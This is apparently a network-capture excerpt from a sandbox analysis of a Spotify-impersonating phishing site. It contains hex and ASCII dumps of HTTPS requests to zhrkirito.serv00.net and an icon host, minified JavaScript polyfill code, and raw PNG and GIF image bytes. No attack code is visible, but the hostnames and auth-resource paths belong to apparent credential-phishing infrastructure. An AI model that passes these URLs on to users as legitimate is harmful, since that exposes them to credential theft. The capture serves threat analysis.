                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 74 75 72 6e 20 75 2e 6c 65 6e 67 74 68 3d 73 2c 75 7d 7d 29 3b 76 61 72 20 64 61 3d 77 74 2e 66 2c 76 61 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2c 67 61 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 26 26 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 3f 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 28 77 69 6e 64 6f 77 29 3a 5b 5d 2c 79 61 3d 7b 66 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 67 61 26 26 22 5b 6f 62 6a 65 63 74 20 57 69 6e 64 6f 77 5d 22 3d 3d 76 61 2e 63 61 6c 6c 28 74 29 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 64 61 28 74 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 67 61
                                                                                                                      Data Ascii: turn u.length=s,u}});var da=wt.f,va={}.toString,ga="object"==typeof window&&window&&Object.getOwnPropertyNames?Object.getOwnPropertyNames(window):[],ya={f:function(t){return ga&&"[object Window]"==va.call(t)?function(t){try{return da(t)}catch(t){return ga
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 21 30 29 3a 28 65 2b 3d 74 5b 72 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2c 72 3c 37 26 26 28 65 2b 3d 22 3a 22 29 29 29 3b 72 65 74 75 72 6e 22 5b 22 2b 65 2b 22 5d 22 7d 72 65 74 75 72 6e 20 74 7d 2c 56 73 3d 7b 7d 2c 48 73 3d 44 75 28 7b 7d 2c 56 73 2c 7b 22 20 22 3a 31 2c 27 22 27 3a 31 2c 22 3c 22 3a 31 2c 22 3e 22 3a 31 2c 22 60 22 3a 31 7d 29 2c 58 73 3d 44 75 28 7b 7d 2c 48 73 2c 7b 22 23 22 3a 31 2c 22 3f 22 3a 31 2c 22 7b 22 3a 31 2c 22 7d 22 3a 31 7d 29 2c 59 73 3d 44 75 28 7b 7d 2c 58 73 2c 7b 22 2f 22 3a 31 2c 22 3a 22 3a 31 2c 22 3b 22 3a 31 2c 22 3d 22 3a 31 2c 22 40 22 3a 31 2c 22 5b 22 3a 31 2c 22 5c 5c 22 3a 31 2c 22 5d 22 3a 31 2c 22 5e 22 3a 31 2c 22 7c 22 3a 31 7d 29 2c 4a 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20
                                                                                                                      Data Ascii: !0):(e+=t[r].toString(16),r<7&&(e+=":")));return"["+e+"]"}return t},Vs={},Hs=Du({},Vs,{" ":1,'"':1,"<":1,">":1,"`":1}),Xs=Du({},Hs,{"#":1,"?":1,"{":1,"}":1}),Ys=Du({},Xs,{"/":1,":":1,";":1,"=":1,"@":1,"[":1,"\\":1,"]":1,"^":1,"|":1}),Js=function(t,e){var
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 28 72 3f 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 55 66 28 65 2c 74 28 29 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 29 7d 3a 74 2c 72 3f 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 55 66 28 65 2c 74 28 29 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 72 7d 29 7d 3a 74 29 7d 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 48 63 7c 7c 48 63 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 61 6c 6c 79 7c 7c 72 74 28 48 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 66 69 6e 61 6c 6c 79 22 2c 69 74 28 22 50 72 6f 6d 69 73 65 22 29 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 61 6c 6c 79 29 3b 76 61 72 20 63 6c 3d 65 74 2e 73 65 74 2c 66 6c 3d 65 74 2e 67 65 74 74 65
                                                                                                                      Data Ascii: (r?function(r){return Uf(e,t()).then(function(){return r})}:t,r?function(r){return Uf(e,t()).then(function(){throw r})}:t)}}),"function"!=typeof Hc||Hc.prototype.finally||rt(Hc.prototype,"finally",it("Promise").prototype.finally);var cl=et.set,fl=et.gette
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 26 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 68 74 6d 6c 66 69 6c 65 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 74 2c 65 3b 48 74 3d 74 74 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 77 72 69 74 65 28 56 74 28 22 22 29 29 2c 74 2e 63 6c 6f 73 65 28 29 3b 76 61 72 20 65 3d 74 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 2e 4f 62 6a 65 63 74 3b 72 65 74 75 72 6e 20 74 3d 6e 75 6c 6c 2c 65 7d 28 74 74 29 3a 28 28 65 3d 78 28 22 69 66 72 61 6d 65 22 29 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 2c 4b 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2c 65 2e 73 72 63 3d 53 74 72 69 6e 67 28 22 6a 61 76 61 73 63 72 69 70 74 3a 22 29 2c 28 74 3d 65 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 2e
                                                                                                                      Data Ascii: &new ActiveXObject("htmlfile")}catch(t){}var t,e;Ht=tt?function(t){t.write(Vt("")),t.close();var e=t.parentWindow.Object;return t=null,e}(tt):((e=x("iframe")).style.display="none",Kt.appendChild(e),e.src=String("javascript:"),(t=e.contentWindow.document).
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 69 6f 6e 28 74 2c 72 29 7b 69 66 28 6e 28 72 2c 74 2c 65 29 29 72 65 74 75 72 6e 20 4e 72 2e 73 74 6f 70 28 74 29 7d 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2e 72 65 73 75 6c 74 7d 7d 29 2c 4c 74 28 7b 74 61 72 67 65 74 3a 22 4d 61 70 22 2c 73 74 61 74 3a 21 30 7d 2c 7b 67 72 6f 75 70 42 79 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 74 68 69 73 3b 5a 74 28 65 29 3b 76 61 72 20 6e 3d 5a 74 28 72 2e 68 61 73 29 2c 6f 3d 5a 74 28 72 2e 67 65 74 29 2c 69 3d 5a 74 28 72 2e 73 65 74 29 3b 72 65 74 75 72 6e 20 4e 72 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 3d 65 28 74 29 3b 6e 2e 63 61 6c 6c 28 72 2c 61 29 3f 6f 2e 63 61 6c 6c 28 72 2c 61 29 2e 70 75 73 68 28 74 29 3a 69 2e 63 61 6c 6c 28 72 2c 61 2c 5b 74 5d
                                                                                                                      Data Ascii: ion(t,r){if(n(r,t,e))return Nr.stop(t)},void 0,!0,!0).result}}),Lt({target:"Map",stat:!0},{groupBy:function(t,e){var r=new this;Zt(e);var n=Zt(r.has),o=Zt(r.get),i=Zt(r.set);return Nr(t,function(t){var a=e(t);n.call(r,a)?o.call(r,a).push(t):i.call(r,a,[t]
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 3b 76 61 72 20 65 3d 74 68 69 73 2e 65 78 65 63 28 74 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 65 26 26 21 79 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 65 67 45 78 70 20 65 78 65 63 20 6d 65 74 68 6f 64 20 72 65 74 75 72 6e 65 64 20 73 6f 6d 65 74 68 69 6e 67 20 6f 74 68 65 72 20 74 68 61 6e 20 61 6e 20 4f 62 6a 65 63 74 20 6f 72 20 6e 75 6c 6c 22 29 3b 72 65 74 75 72 6e 21 21 65 7d 7d 29 3b 76 61 72 20 55 69 3d 71 74 28 22 73 70 65 63 69 65 73 22 29 2c 4d 69 3d 21 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 2f 2e 2f 3b 72 65 74 75 72 6e 20 74 2e 65 78 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 2e 67 72 6f 75 70 73 3d 7b 61 3a 22 37 22 7d 2c 74 7d 2c 22 37 22 21 3d 3d 22 22
                                                                                                                      Data Ascii: ;var e=this.exec(t);if(null!==e&&!y(e))throw new Error("RegExp exec method returned something other than an Object or null");return!!e}});var Ui=qt("species"),Mi=!o(function(){var t=/./;return t.exec=function(){var t=[];return t.groups={a:"7"},t},"7"!==""
                                                                                                                      2025-01-12 23:23:34 UTC16384INData Raw: 22 70 61 64 53 74 61 72 74 22 29 3b 76 61 72 20 78 75 3d 77 75 2e 65 6e 64 3b 4c 74 28 7b 74 61 72 67 65 74 3a 22 53 74 72 69 6e 67 22 2c 70 72 6f 74 6f 3a 21 30 2c 66 6f 72 63 65 64 3a 53 75 7d 2c 7b 70 61 64 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 78 75 28 74 68 69 73 2c 74 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 29 7d 7d 29 2c 72 65 28 22 53 74 72 69 6e 67 22 2c 22 70 61 64 45 6e 64 22 29 2c 4c 74 28 7b 74 61 72 67 65 74 3a 22 53 74 72 69 6e 67 22 2c 73 74 61 74 3a 21 30 7d 2c 7b 72 61 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 67 28 74 2e 72 61 77 29 2c 72 3d 66 74 28 65 2e 6c 65 6e 67 74 68 29 2c 6e 3d 61 72 67 75 6d
                                                                                                                      Data Ascii: "padStart");var xu=wu.end;Lt({target:"String",proto:!0,forced:Su},{padEnd:function(t){return xu(this,t,arguments.length>1?arguments[1]:void 0)}}),re("String","padEnd"),Lt({target:"String",stat:!0},{raw:function(t){for(var e=g(t.raw),r=ft(e.length),n=argum


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.449765128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:35 UTC373OUTGET /spotify/app/auth/res/logo.png HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:36 UTC227INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:36 GMT
                                                                                                                      Content-Type: image/png
                                                                                                                      Content-Length: 3282
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-cd2"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:36 UTC3282INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9f 00 00 00 3f 08 06 00 00 00 fe 07 1a 0e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 0c 67 49 44 41 54 78 5e ed 9c 05 ac 54 47 17 c7 09 92 14 2d 10 1c 02 a5 b8 bb 15 b7 16 0d c5 8b 13 20 b8 06 8a 85 06 29 6e a5 b8 43 d1 00 41 8b 43 70 08 ee ee ee 2e 2d 21 c0 7c df 7f 76 ee 32 77 f6 dc bd 77 df db bd cb 7b 9d 7f f2 4b e0 dc 99 d9 d9 bd 73 67 ce 9c 33 f7 c5 f8 bf 98 46 13 26 48 a3 46 e3 06 a4 51 a3 71 03 d2 a8 d1 b8 01 69 d4 68 dc 80 34 6a 34 6e 40 1a 35 1a 37 20 8d 1a 8d 1b 90 c6 48 13 2f 5e 3c 56 b9 72 65 36 68 d0 20 b6 7d fb 76 f6 e6 cd 1b a6 ea d1 a3 47 6c f5 ea d5 ac 67 cf 9e ac 68 d1
                                                                                                                      Data Ascii: PNGIHDR?sRGBgAMAapHYsttfxgIDATx^TG- )nCACp.-!|v2ww{Ksg3F&HFQqih4j4n@57 H/^<Vre6h }vGlgh


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.44976413.32.121.484432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:35 UTC635OUTGET /assets.00/spotify-icon-2048x2048-n3imyp8e.png HTTP/1.1
                                                                                                                      Host: static-00.iconduck.com
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                      Referer: https://premium-subscription.app/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:36 UTC473INHTTP/1.1 200 OK
                                                                                                                      Content-Type: image/png
                                                                                                                      Content-Length: 48672
                                                                                                                      Connection: close
                                                                                                                      Last-Modified: Fri, 03 Sep 2021 11:55:29 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Server: AmazonS3
                                                                                                                      Date: Sun, 12 Jan 2025 16:57:05 GMT
                                                                                                                      ETag: "0aff7d5f2e65dedc9d0c94456c50b5e7"
                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                      Via: 1.1 c60125e7f3465aceafb0abd071a41a36.cloudfront.net (CloudFront)
                                                                                                                      X-Amz-Cf-Pop: FRA60-P1
                                                                                                                      X-Amz-Cf-Id: F-9fDdi-p87B_gXvgnQpgYBMeX2bQTsIsq8d8kPO-6nhrA0Cxw5w5w==
                                                                                                                      Age: 23191
                                                                                                                      Vary: Origin
                                                                                                                      2025-01-12 23:23:36 UTC15911INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 00 00 00 08 00 08 03 00 00 00 85 79 23 02 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 07 74 49 4d 45 07 e5 02 0b 02 18 06 4f 60 1d f2 00 00 03 00 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: PNGIHDRy#gAMAa cHRMz&u0`:pQ<tIMEO`PLTE
                                                                                                                      2025-01-12 23:23:36 UTC16384INData Raw: ab 9d ba 8f f8 ec bb 15 2b 8e 9c 0e 4f 67 c8 48 4a d8 e9 7f 56 ac 98 3e 66 f4 9b 9d 5a 37 ac 5f bd 62 79 cf 22 2e 04 20 b4 16 1b 6e 32 64 d3 16 1b b2 a8 95 0c 59 b8 d1 83 a0 70 94 f0 ab da b0 7d 8f be 63 c6 cc 9c bf 70 f3 8e a3 17 af 24 31 64 5f fc e5 8b 87 76 6c 5e 3c ff fb 31 63 06 f7 ea d6 b4 61 f9 17 dc 09 40 40 aa e2 fd b7 27 33 64 cb c5 4a 64 49 45 4f 33 64 c1 b4 c2 8b a0 20 79 56 6a d8 b9 c7 98 2f 17 2d db bc e3 9f 53 17 23 63 19 f2 2a 31 ea fa d9 53 7b b6 af 5f 36 77 c2 e8 1e 9d 5f a9 f4 02 01 88 44 57 f1 83 0b 0c d9 11 dd 83 2c a9 ed 0d 86 ac 44 76 26 c8 7f 6a af 5a 2d fa 7d 30 7f c9 de 93 21 61 11 91 d1 89 29 12 83 c5 99 92 13 a3 23 af 84 85 9e 3c b0 7c fe 84 81 dd eb fa 6b 09 40 04 76 95 7f 4d 63 78 3e c3 f7 64 41 aa c9 c9 0c 59 fa c3 97 c0 f2
                                                                                                                      Data Ascii: +OgHJV>fZ7_by". n2dYp}cp$1d_vl^<1ca@@'3dJdIEO3d yVj/-S#c*1S{_6w_DW,Dv&jZ-}0!a)#<|k@vMcx>dAY
                                                                                                                      2025-01-12 23:23:36 UTC16377INData Raw: af 3d f1 8f 81 3d 9a 27 09 4c 27 b5 dd c9 d7 8c 1c ff fe bc 1f b6 ee 53 00 d6 52 9a 2c 95 f6 95 02 d1 16 d8 bc 68 da eb 4f dc 71 d9 d9 3d 5a 35 16 98 9a 3b b3 6d b7 81 57 df 37 66 ca b7 5b 15 80 65 7c 25 95 f7 b0 02 d1 53 ba fa a3 71 23 ae 38 ed f8 a3 9a e7 a4 b9 05 56 91 98 99 7f 44 f7 f3 6e 7a 71 e6 7a 05 60 05 0f 4b e5 f5 51 20 c2 8c 70 28 e8 2f 5d f1 c1 d3 57 f4 6a da 30 3b 23 c5 23 b0 22 77 52 ad ba 8d da f7 bb fb ad 85 c5 fe 60 c8 50 00 a6 65 f4 91 ca 6b be 5b 81 48 31 ca 77 15 ac 59 32 73 f4 2d 67 b5 4b 16 d8 86 b7 d9 99 77 4d fc 61 55 41 51 40 01 98 51 41 be 54 5e fd 19 0a 44 40 d9 e6 a5 73 a6 8e 7b e8 aa d3 da 65 0a ec 28 f9 b0 3e 37 8e 7e 67 ce e2 ed 41 05 60 32 33 ea 4b e5 a5 3d a4 40 b5 18 6b be fa f7 cb 23 af 3f bb 47 ab 7a 02 9b ab d9 f2 84
                                                                                                                      Data Ascii: =='L'SR,hOq=Z5;mW7f[e|%Sq#8VDnzqz`KQ p(/]Wj0;##"wR`Pek[H1wY2s-gKwMaUAQ@QAT^D@s{e(>7~gA`23K=@k#?Gz


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.449766128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:35 UTC377OUTGET /spotify/app/auth/res/remember.png HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:36 UTC226INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:36 GMT
                                                                                                                      Content-Type: image/png
                                                                                                                      Content-Length: 507
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-1fb"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:36 UTC507INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2f 00 00 00 1f 08 06 00 00 00 77 5d 94 01 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 01 90 49 44 41 54 58 47 d5 96 31 4e 03 31 10 45 d3 53 b1 10 29 20 14 21 41 c1 0d 68 d2 40 47 99 82 1a 0e c2 0d a8 b8 0a 07 e0 14 48 1c 67 d8 6f c9 f1 d8 f9 e0 09 3b 8b 34 91 9e a2 f9 6b 8f bf ed b1 77 17 e3 4f 02 43 c5 28 50 31 0a 54 8c 02 15 a3 40 c5 8a a3 ed b5 9c be dd c9 f9 c7 a3 ac 3f 9f 64 fd f5 ec c3 98 0b 39 91 1b 63 b0 b1 3b 50 31 81 84 c9 30 1b 78 06 30 d6 81 93 a0 a2 1c bf dc d2 01 fe 03 8c cd 3c 11 f6 c5 b9 8c 9f bd de cb f2 e1 46 4e 2e 57 32 0c 43 fa 47 0c bd 6d 6b 9c 40 2d 60 db da 44 53 b9
                                                                                                                      Data Ascii: PNGIHDR/w]sRGBgAMAapHYsttfxIDATXG1N1ES) !Ah@GHgo;4kwOC(P1T@?d9c;P10x0<FN.W2CGmk@-`DS


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.449767128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:35 UTC376OUTGET /spotify/app/auth/res/loading.gif HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:36 UTC230INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:36 GMT
                                                                                                                      Content-Type: image/gif
                                                                                                                      Content-Length: 79790
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-137ae"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2025-01-12 23:23:36 UTC16154INData Raw: 47 49 46 38 39 61 c8 00 c8 00 f7 00 00 1e d7 60 1f d7 61 20 d7 61 21 d8 62 24 d8 64 26 d8 66 27 d9 66 28 d9 67 29 d9 68 2a d9 68 2b d9 69 2d da 6b 2e da 6b 2f da 6c 30 da 6d 32 db 6e 37 db 72 3a dc 74 3b dc 74 3c dc 75 3d dd 76 41 dd 79 44 de 7b 45 de 7c 46 de 7c 47 de 7d 48 de 7e 4b df 80 4e e0 82 4f e0 83 50 e0 83 51 e0 84 53 e1 86 54 e1 86 55 e1 87 59 e1 89 5a e2 8b 5b e2 8b 5c e2 8c 5d e2 8c 65 e4 92 67 e4 93 67 e4 94 68 e4 94 69 e4 95 6b e5 96 6c e5 97 6e e5 99 6f e5 99 71 e6 9a 71 e6 9b 72 e6 9b 72 e6 9c 74 e6 9d 76 e7 9e 77 e7 9f 7b e8 a2 7c e8 a2 7d e8 a3 7e e8 a4 80 e8 a6 81 e9 a6 83 e9 a7 85 e9 a9 87 ea aa 89 ea ab 89 ea ac 8a ea ac 8b ea ad 8c eb ae 8f eb af 93 ec b2 94 ec b3 96 ec b5 97 ec b5 99 ed b7 9c ed b9 9e ee ba a0 ee bc a2 ee bd a4 ef
                                                                                                                      Data Ascii: GIF89a`a a!b$d&f'f(g)h*h+i-k.k/l0m2n7r:t;t<u=vAyD{E|F|G}H~KNOPQSTUYZ[\]egghiklnoqqrrtvw{|}~
                                                                                                                      2025-01-12 23:23:36 UTC16384INData Raw: 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 4e e5 e3 a6 4c 98 2a 4d 92 14 11 a2 83 c6 84 09 38 82 14 51 02 a5 cb 18 34 75 02 69 95 6a 87 cc 15 24 67 f3 ea dd cb 57 2f 8c 22 50 c4 c0 41 34 f7 e8 9c 30 4a fa 2a 5e cc 78 42 92 2e 66 f8 14 f6 29 c8 8c 94 1c 8d 33 6b e6 2b c4 0b 9c 49 93 6d 2a 3a f3 04 c5 e6 d3 a8 f3 ea b0 c2 46 51 68 98 74 b0 dc 48 4d bb 76 8e 2f 7e 5e ab 04 24 a6 48 ed df bf 4f 40 69 a3 bb 64 9f 2a 2a 80 2b 07 4e 64 8c a1 e2 1f fd 54 59 4e 5d 39 0c 2b 7b a0 6b fc 93 c5 45 f5 ef c0 55 fe 74 21 a4 bd e2 22 31 30 c0 ab 07 7e 83 cc a3 f2 11 e5 10 59 4f 9f 39 71 f8 0c 05 51 a9 cf 1f f8 93 ec f8 1d 34 49 19 38 f4 67 60 6d 2e 8c 11 60 41 7f 30 71 e0 83 b5 35 21 d7 82 6c 60 06 e1 85 a8 e9 e0 06 7e 8a 74 81 e1
                                                                                                                      Data Ascii: JH*]PJJXNL*M8Q4uij$gW/"PA40J*^xB.f)3k+Im*:FQhtHMv/~^$HO@id**+NdTYN]9+{kEUt!"10~YO9qQ4I8g`m.`A0q5!l`~t
                                                                                                                      2025-01-12 23:23:36 UTC16384INData Raw: d7 39 91 89 53 9f 70 71 9d a9 3f 41 92 6c 73 50 94 f7 94 9a cd d9 a0 ab 4f 58 58 a7 05 55 5d 58 87 c5 4f 7f 68 5c e9 54 a2 64 61 9d 1c 3d 8d 72 44 73 54 8c 4c 15 28 55 34 07 c4 26 3c b5 d1 9c 12 34 5f c5 09 12 cd 99 b1 93 26 80 0a 47 84 b7 57 39 42 5f 70 36 54 98 d3 18 cc dd b0 88 61 7f c4 1a 9c 18 39 41 72 ab 6a 2b 08 32 da 19 cc b9 10 dd 4d 14 07 97 06 6f df 09 d7 c5 4d 94 e4 18 5c 13 d9 8e 56 49 d0 b7 95 80 88 4d 65 08 e7 42 bf bc d9 c1 dc fe d9 34 81 02 b7 6d 9b 72 b7 ed 6d 2e 28 2d d3 1b c2 3d 11 df 24 47 db 36 f6 4c f5 da 76 02 9f e6 91 1b 5c 11 6d bf b4 87 70 5e 34 18 85 70 78 c8 44 45 70 2e 5c 1c 9f 20 00 c6 04 89 70 54 5b 68 72 dc 5f bb c4 46 70 35 18 3e 20 22 52 d7 76 06 4c 52 4c 6d e1 40 0a df d6 c4 4b 96 98 69 1b de 16 2e 22 1c d1 2a 11 7c 1b
                                                                                                                      Data Ascii: 9Spq?AlsPOXXU]XOh\Tda=rDsTL(U4&<4_&GW9B_p6Ta9Arj+2MoM\VIMeB4mrm.(-=$G6Lv\mp^4pxDEp.\ pT[hr_Fp5> "RvLRLm@Ki."*|
